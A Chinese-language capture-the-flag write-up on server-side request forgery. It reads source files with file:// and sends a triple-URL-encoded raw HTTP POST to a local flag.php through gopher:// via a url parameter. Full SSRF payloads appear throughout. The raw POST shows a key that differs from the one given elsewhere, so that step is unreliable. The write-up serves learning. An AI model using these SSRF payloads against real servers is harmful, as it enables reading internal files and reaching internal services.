一、Post请求
1.先用伪协议尝试读取index.php和flag.php文件
以下为index.php源代码
再看flag.php里出现了一串奇怪的key,利用curl和gopher协议POST数据到flag.php即可
key=88e24a185b1471ea34764dfb6129c7d7
思路:往index.php里传入我们的payload
?/?url=127.0.0.1:80/index.php?url=gopher://POST包
2.构造post请求
注意项:?①对构造的post包进行三次URL编码,本体一次,传入index一次,跳转到flag一次
②编码第一次后的%0A全部替换成%0D%0A
③content-length为最后一行的长度,即post数据的大小
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=8a6d748f4f820709cd9e444991d49dd0
进行三次编码修改后可得:
POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application/x-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D88e24a185b1471ea34764dfb6129c7d7
3.发送请求
gopher协议格式:URL:gopher://<host>:<port>/<gopher-path>_后接TCP数据流
?url=127.0.0.1/index.php/?url=gopher://127.0.0.1:80/_POST包
?如图发送数据包即可返回两个HTTP请求(右边两次 200 OK)
注意:要进行两次?url=跳转,第一次转到127.0.0.1/index.php后,再将?url=构造的post包传入index.php后才可成功获取flag,否则返回错误
二、上传文件
?1.构造file伪协议payload查看index.php和flag.php源代码
?url=file:///var/www/html/index.php(flag.php)
发现此题跟上题类似,只是这次需要post上传的是一个文件?
?2.网页中没有提交按钮,修改源代码添加提交按钮
<input type="submit" name="submit">
3.提交文件,并抓包,这个包就是我们要构造的POST包?
?编码左边请求包--->编码一次修改%0A为%0D%0A后,再连续编码两次
?4.构造payload发送请求
?url=127.0.0.1/index.php/?url=gopher://127.0.0.1:80/_POST包
?成功获取flag!